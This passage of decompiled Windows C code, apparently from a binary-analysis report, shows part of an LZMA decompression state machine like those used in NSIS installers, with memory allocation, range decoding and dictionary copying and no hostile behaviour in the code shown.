                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L1:
                                                                                                                        					_t534 =  *(_t614 - 0x88);
                                                                                                                        					if(_t534 > 0x1c) {
                                                                                                                        						L171:
                                                                                                                        						_t535 = _t534 | 0xffffffff;
                                                                                                                        						goto L172;
                                                                                                                        					}
                                                                                                                        					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
                                                                                                                        						case 0:
                                                                                                                        							if( *(_t614 - 0x6c) == 0) {
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                        							_t534 =  *( *(_t614 - 0x70));
                                                                                                                        							if(_t534 > 0xe1) {
                                                                                                                        								goto L171;
                                                                                                                        							}
                                                                                                                        							_t538 = _t534 & 0x000000ff;
                                                                                                                        							_push(0x2d);
                                                                                                                        							asm("cdq");
                                                                                                                        							_pop(_t570);
                                                                                                                        							_push(9);
                                                                                                                        							_pop(_t571);
                                                                                                                        							_t610 = _t538 / _t570;
                                                                                                                        							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                        							asm("cdq");
                                                                                                                        							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                                                        							 *(_t614 - 0x3c) = _t605;
                                                                                                                        							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                                                        							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                        							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                                                        							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                                                        								L10:
                                                                                                                        								if(_t613 == 0) {
                                                                                                                        									L12:
                                                                                                                        									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                                                        									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                        									goto L15;
                                                                                                                        								} else {
                                                                                                                        									goto L11;
                                                                                                                        								}
                                                                                                                        								do {
                                                                                                                        									L11:
                                                                                                                        									_t613 = _t613 - 1;
                                                                                                                        									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                                                        								} while (_t613 != 0);
                                                                                                                        								goto L12;
                                                                                                                        							}
                                                                                                                        							if( *(_t614 - 4) != 0) {
                                                                                                                        								GlobalFree( *(_t614 - 4));
                                                                                                                        							}
                                                                                                                        							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                        							 *(_t614 - 4) = _t534;
                                                                                                                        							if(_t534 == 0) {
                                                                                                                        								goto L171;
                                                                                                                        							} else {
                                                                                                                        								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                                                        								goto L10;
                                                                                                                        							}
                                                                                                                        						case 1:
                                                                                                                        							L13:
                                                                                                                        							__eflags =  *(_t614 - 0x6c);
                                                                                                                        							if( *(_t614 - 0x6c) == 0) {
                                                                                                                        								 *(_t614 - 0x88) = 1;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                        							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                                                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                        							_t45 = _t614 - 0x48;
                                                                                                                        							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                                                        							__eflags =  *_t45;
                                                                                                                        							L15:
                                                                                                                        							if( *(_t614 - 0x48) < 4) {
                                                                                                                        								goto L13;
                                                                                                                        							}
                                                                                                                        							_t546 =  *(_t614 - 0x40);
                                                                                                                        							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                                                        								L20:
                                                                                                                        								 *(_t614 - 0x48) = 5;
                                                                                                                        								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                                                        								goto L23;
                                                                                                                        							}
                                                                                                                        							 *(_t614 - 0x74) = _t546;
                                                                                                                        							if( *(_t614 - 8) != 0) {
                                                                                                                        								GlobalFree( *(_t614 - 8));
                                                                                                                        							}
                                                                                                                        							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                                                        							 *(_t614 - 8) = _t534;
                                                                                                                        							if(_t534 == 0) {
                                                                                                                        								goto L171;
                                                                                                                        							} else {
                                                                                                                        								goto L20;
                                                                                                                        							}
                                                                                                                        						case 2:
                                                                                                                        							L24:
                                                                                                                        							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                                                        							 *(_t614 - 0x84) = 6;
                                                                                                                        							 *(_t614 - 0x4c) = _t553;
                                                                                                                        							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                                                        							goto L132;
                                                                                                                        						case 3:
                                                                                                                        							L21:
                                                                                                                        							__eflags =  *(_t614 - 0x6c);
                                                                                                                        							if( *(_t614 - 0x6c) == 0) {
                                                                                                                        								 *(_t614 - 0x88) = 3;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                        							_t67 = _t614 - 0x70;
                                                                                                                        							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                                                        							__eflags =  *_t67;
                                                                                                                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                        							L23:
                                                                                                                        							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                                                        							if( *(_t614 - 0x48) != 0) {
                                                                                                                        								goto L21;
                                                                                                                        							}
                                                                                                                        							goto L24;
                                                                                                                        						case 4:
                                                                                                                        							goto L133;
                                                                                                                        						case 5:
                                                                                                                        							goto L137;
                                                                                                                        						case 6:
                                                                                                                        							goto L0;
                                                                                                                        						case 7:
                                                                                                                        							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                        							if( *(__ebp - 0x40) != 1) {
                                                                                                                        								__eax =  *(__ebp - 0x24);
                                                                                                                        								 *(__ebp - 0x80) = 0x16;
                                                                                                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        								__eax =  *(__ebp - 0x28);
                                                                                                                        								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        								__eax =  *(__ebp - 0x2c);
                                                                                                                        								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        								__eax = 0;
                                                                                                                        								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        								__al = __al & 0x000000fd;
                                                                                                                        								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        								__eax =  *(__ebp - 4);
                                                                                                                        								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                        								__eflags = __eax;
                                                                                                                        								 *(__ebp - 0x58) = __eax;
                                                                                                                        								goto L68;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 4);
                                                                                                                        							__ecx =  *(__ebp - 0x38);
                                                                                                                        							 *(__ebp - 0x84) = 8;
                                                                                                                        							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                        							goto L132;
                                                                                                                        						case 8:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								__eax =  *(__ebp - 4);
                                                                                                                        								__ecx =  *(__ebp - 0x38);
                                                                                                                        								 *(__ebp - 0x84) = 0xa;
                                                                                                                        								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                        							} else {
                                                                                                                        								__eax =  *(__ebp - 0x38);
                                                                                                                        								__ecx =  *(__ebp - 4);
                                                                                                                        								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                        								 *(__ebp - 0x84) = 9;
                                                                                                                        								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                        								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                        							}
                                                                                                                        							goto L132;
                                                                                                                        						case 9:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								goto L89;
                                                                                                                        							}
                                                                                                                        							__eflags =  *(__ebp - 0x60);
                                                                                                                        							if( *(__ebp - 0x60) == 0) {
                                                                                                                        								goto L171;
                                                                                                                        							}
                                                                                                                        							__eax = 0;
                                                                                                                        							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                        							__eflags = _t258;
                                                                                                                        							0 | _t258 = _t258 + _t258 + 9;
                                                                                                                        							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                        							goto L75;
                                                                                                                        						case 0xa:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								__eax =  *(__ebp - 4);
                                                                                                                        								__ecx =  *(__ebp - 0x38);
                                                                                                                        								 *(__ebp - 0x84) = 0xb;
                                                                                                                        								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                        								goto L132;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x28);
                                                                                                                        							goto L88;
                                                                                                                        						case 0xb:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								__ecx =  *(__ebp - 0x24);
                                                                                                                        								__eax =  *(__ebp - 0x20);
                                                                                                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        							} else {
                                                                                                                        								__eax =  *(__ebp - 0x24);
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x28);
                                                                                                                        							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        							L88:
                                                                                                                        							__ecx =  *(__ebp - 0x2c);
                                                                                                                        							 *(__ebp - 0x2c) = __eax;
                                                                                                                        							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        							L89:
                                                                                                                        							__eax =  *(__ebp - 4);
                                                                                                                        							 *(__ebp - 0x80) = 0x15;
                                                                                                                        							__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                        							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                        							goto L68;
                                                                                                                        						case 0xc:
                                                                                                                        							L99:
                                                                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0xc;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x70);
                                                                                                                        							__eax =  *(__ebp - 0xc);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							_t334 = __ebp - 0x70;
                                                                                                                        							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                        							__eflags =  *_t334;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							__eax =  *(__ebp - 0x2c);
                                                                                                                        							goto L101;
                                                                                                                        						case 0xd:
                                                                                                                        							goto L36;
                                                                                                                        						case 0xe:
                                                                                                                        							goto L45;
                                                                                                                        						case 0xf:
                                                                                                                        							goto L57;
                                                                                                                        						case 0x10:
                                                                                                                        							L109:
                                                                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0x10;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x70);
                                                                                                                        							__eax =  *(__ebp - 0xc);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							_t365 = __ebp - 0x70;
                                                                                                                        							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                        							__eflags =  *_t365;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							goto L111;
                                                                                                                        						case 0x11:
                                                                                                                        							L68:
                                                                                                                        							__esi =  *(__ebp - 0x58);
                                                                                                                        							 *(__ebp - 0x84) = 0x12;
                                                                                                                        							goto L132;
                                                                                                                        						case 0x12:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								__eax =  *(__ebp - 0x58);
                                                                                                                        								 *(__ebp - 0x84) = 0x13;
                                                                                                                        								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                        								goto L132;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x4c);
                                                                                                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                        							__ecx =  *(__ebp - 0x58);
                                                                                                                        							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        							__eflags = __eax;
                                                                                                                        							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                        							goto L130;
                                                                                                                        						case 0x13:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								_t469 = __ebp - 0x58;
                                                                                                                        								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                        								__eflags =  *_t469;
                                                                                                                        								 *(__ebp - 0x30) = 0x10;
                                                                                                                        								 *(__ebp - 0x40) = 8;
                                                                                                                        								L144:
                                                                                                                        								 *(__ebp - 0x7c) = 0x14;
                                                                                                                        								goto L145;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x4c);
                                                                                                                        							__ecx =  *(__ebp - 0x58);
                                                                                                                        							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        							 *(__ebp - 0x30) = 8;
                                                                                                                        							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                        							L130:
                                                                                                                        							 *(__ebp - 0x58) = __eax;
                                                                                                                        							 *(__ebp - 0x40) = 3;
                                                                                                                        							goto L144;
                                                                                                                        						case 0x14:
                                                                                                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                        							__eax =  *(__ebp - 0x80);
                                                                                                                        							goto L140;
                                                                                                                        						case 0x15:
                                                                                                                        							__eax = 0;
                                                                                                                        							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        							__al = __al & 0x000000fd;
                                                                                                                        							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        							goto L120;
                                                                                                                        						case 0x16:
                                                                                                                        							__eax =  *(__ebp - 0x30);
                                                                                                                        							__eflags = __eax - 4;
                                                                                                                        							if(__eax >= 4) {
                                                                                                                        								_push(3);
                                                                                                                        								_pop(__eax);
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 4);
                                                                                                                        							 *(__ebp - 0x40) = 6;
                                                                                                                        							__eax = __eax << 7;
                                                                                                                        							 *(__ebp - 0x7c) = 0x19;
                                                                                                                        							 *(__ebp - 0x58) = __eax;
                                                                                                                        							goto L145;
                                                                                                                        						case 0x17:
                                                                                                                        							L145:
                                                                                                                        							__eax =  *(__ebp - 0x40);
                                                                                                                        							 *(__ebp - 0x50) = 1;
                                                                                                                        							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                        							goto L149;
                                                                                                                        						case 0x18:
                                                                                                                        							L146:
                                                                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0x18;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x70);
                                                                                                                        							__eax =  *(__ebp - 0xc);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							_t484 = __ebp - 0x70;
                                                                                                                        							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                        							__eflags =  *_t484;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							L148:
                                                                                                                        							_t487 = __ebp - 0x48;
                                                                                                                        							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                        							__eflags =  *_t487;
                                                                                                                        							L149:
                                                                                                                        							__eflags =  *(__ebp - 0x48);
                                                                                                                        							if( *(__ebp - 0x48) <= 0) {
                                                                                                                        								__ecx =  *(__ebp - 0x40);
                                                                                                                        								__ebx =  *(__ebp - 0x50);
                                                                                                                        								0 = 1;
                                                                                                                        								__eax = 1 << __cl;
                                                                                                                        								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                        								__eax =  *(__ebp - 0x7c);
                                                                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                                                                        								goto L140;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x50);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        							__eax =  *(__ebp - 0x58);
                                                                                                                        							__esi = __edx + __eax;
                                                                                                                        							 *(__ebp - 0x54) = __esi;
                                                                                                                        							__ax =  *__esi;
                                                                                                                        							__edi = __ax & 0x0000ffff;
                                                                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        								__cx = __ax;
                                                                                                                        								__cx = __ax >> 5;
                                                                                                                        								__eax = __eax - __ecx;
                                                                                                                        								__edx = __edx + 1;
                                                                                                                        								__eflags = __edx;
                                                                                                                        								 *__esi = __ax;
                                                                                                                        								 *(__ebp - 0x50) = __edx;
                                                                                                                        							} else {
                                                                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                                                                        								0x800 = 0x800 - __edi;
                                                                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        								 *__esi = __cx;
                                                                                                                        							}
                                                                                                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        								goto L148;
                                                                                                                        							} else {
                                                                                                                        								goto L146;
                                                                                                                        							}
                                                                                                                        						case 0x19:
                                                                                                                        							__eflags = __ebx - 4;
                                                                                                                        							if(__ebx < 4) {
                                                                                                                        								 *(__ebp - 0x2c) = __ebx;
                                                                                                                        								L119:
                                                                                                                        								_t393 = __ebp - 0x2c;
                                                                                                                        								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                        								__eflags =  *_t393;
                                                                                                                        								L120:
                                                                                                                        								__eax =  *(__ebp - 0x2c);
                                                                                                                        								__eflags = __eax;
                                                                                                                        								if(__eax == 0) {
                                                                                                                        									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                        									goto L170;
                                                                                                                        								}
                                                                                                                        								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                        								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                        									goto L171;
                                                                                                                        								}
                                                                                                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                        								__eax =  *(__ebp - 0x30);
                                                                                                                        								_t400 = __ebp - 0x60;
                                                                                                                        								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                        								__eflags =  *_t400;
                                                                                                                        								goto L123;
                                                                                                                        							}
                                                                                                                        							__ecx = __ebx;
                                                                                                                        							__eax = __ebx;
                                                                                                                        							__ecx = __ebx >> 1;
                                                                                                                        							__eax = __ebx & 0x00000001;
                                                                                                                        							__ecx = (__ebx >> 1) - 1;
                                                                                                                        							__al = __al | 0x00000002;
                                                                                                                        							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                        							__eflags = __ebx - 0xe;
                                                                                                                        							 *(__ebp - 0x2c) = __eax;
                                                                                                                        							if(__ebx >= 0xe) {
                                                                                                                        								__ebx = 0;
                                                                                                                        								 *(__ebp - 0x48) = __ecx;
                                                                                                                        								L102:
                                                                                                                        								__eflags =  *(__ebp - 0x48);
                                                                                                                        								if( *(__ebp - 0x48) <= 0) {
                                                                                                                        									__eax = __eax + __ebx;
                                                                                                                        									 *(__ebp - 0x40) = 4;
                                                                                                                        									 *(__ebp - 0x2c) = __eax;
                                                                                                                        									__eax =  *(__ebp - 4);
                                                                                                                        									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                        									__eflags = __eax;
                                                                                                                        									L108:
                                                                                                                        									__ebx = 0;
                                                                                                                        									 *(__ebp - 0x58) = __eax;
                                                                                                                        									 *(__ebp - 0x50) = 1;
                                                                                                                        									 *(__ebp - 0x44) = 0;
                                                                                                                        									 *(__ebp - 0x48) = 0;
                                                                                                                        									L112:
                                                                                                                        									__eax =  *(__ebp - 0x40);
                                                                                                                        									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                        										_t391 = __ebp - 0x2c;
                                                                                                                        										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                        										__eflags =  *_t391;
                                                                                                                        										goto L119;
                                                                                                                        									}
                                                                                                                        									__eax =  *(__ebp - 0x50);
                                                                                                                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        									__eax =  *(__ebp - 0x58);
                                                                                                                        									__esi = __edi + __eax;
                                                                                                                        									 *(__ebp - 0x54) = __esi;
                                                                                                                        									__ax =  *__esi;
                                                                                                                        									__ecx = __ax & 0x0000ffff;
                                                                                                                        									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                        									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                        									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                        										__ecx = 0;
                                                                                                                        										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                        										__ecx = 1;
                                                                                                                        										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                        										__ebx = 1;
                                                                                                                        										__ecx =  *(__ebp - 0x48);
                                                                                                                        										__ebx = 1 << __cl;
                                                                                                                        										__ecx = 1 << __cl;
                                                                                                                        										__ebx =  *(__ebp - 0x44);
                                                                                                                        										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                        										__cx = __ax;
                                                                                                                        										__cx = __ax >> 5;
                                                                                                                        										__eax = __eax - __ecx;
                                                                                                                        										__edi = __edi + 1;
                                                                                                                        										__eflags = __edi;
                                                                                                                        										 *(__ebp - 0x44) = __ebx;
                                                                                                                        										 *__esi = __ax;
                                                                                                                        										 *(__ebp - 0x50) = __edi;
                                                                                                                        									} else {
                                                                                                                        										 *(__ebp - 0x10) = __edx;
                                                                                                                        										0x800 = 0x800 - __ecx;
                                                                                                                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                        										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        										 *__esi = __dx;
                                                                                                                        									}
                                                                                                                        									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        										L111:
                                                                                                                        										_t368 = __ebp - 0x48;
                                                                                                                        										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                        										__eflags =  *_t368;
                                                                                                                        										goto L112;
                                                                                                                        									} else {
                                                                                                                        										goto L109;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								__ecx =  *(__ebp - 0xc);
                                                                                                                        								__ebx = __ebx + __ebx;
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                        								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                                                                        								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                        									__ecx =  *(__ebp - 0x10);
                                                                                                                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        									__ebx = __ebx | 0x00000001;
                                                                                                                        									__eflags = __ebx;
                                                                                                                        									 *(__ebp - 0x44) = __ebx;
                                                                                                                        								}
                                                                                                                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        									L101:
                                                                                                                        									_t338 = __ebp - 0x48;
                                                                                                                        									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                        									__eflags =  *_t338;
                                                                                                                        									goto L102;
                                                                                                                        								} else {
                                                                                                                        									goto L99;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							__edx =  *(__ebp - 4);
                                                                                                                        							__eax = __eax - __ebx;
                                                                                                                        							 *(__ebp - 0x40) = __ecx;
                                                                                                                        							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                        							goto L108;
                                                                                                                        						case 0x1a:
                                                                                                                        							goto L55;
                                                                                                                        						case 0x1b:
                                                                                                                        							L75:
                                                                                                                        							__eflags =  *(__ebp - 0x64);
                                                                                                                        							if( *(__ebp - 0x64) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0x1b;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x14);
                                                                                                                        							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        							__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        								__eflags = __eax;
                                                                                                                        							}
                                                                                                                        							__edx =  *(__ebp - 8);
                                                                                                                        							__cl =  *(__eax + __edx);
                                                                                                                        							__eax =  *(__ebp - 0x14);
                                                                                                                        							 *(__ebp - 0x5c) = __cl;
                                                                                                                        							 *(__eax + __edx) = __cl;
                                                                                                                        							__eax = __eax + 1;
                                                                                                                        							__edx = 0;
                                                                                                                        							_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                        							__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        							__edx = _t274;
                                                                                                                        							__eax =  *(__ebp - 0x68);
                                                                                                                        							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        							_t283 = __ebp - 0x64;
                                                                                                                        							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                        							__eflags =  *_t283;
                                                                                                                        							 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        							goto L79;
                                                                                                                        						case 0x1c:
                                                                                                                        							while(1) {
                                                                                                                        								L123:
                                                                                                                        								__eflags =  *(__ebp - 0x64);
                                                                                                                        								if( *(__ebp - 0x64) == 0) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								__eax =  *(__ebp - 0x14);
                                                                                                                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        									__eflags = __eax;
                                                                                                                        								}
                                                                                                                        								__edx =  *(__ebp - 8);
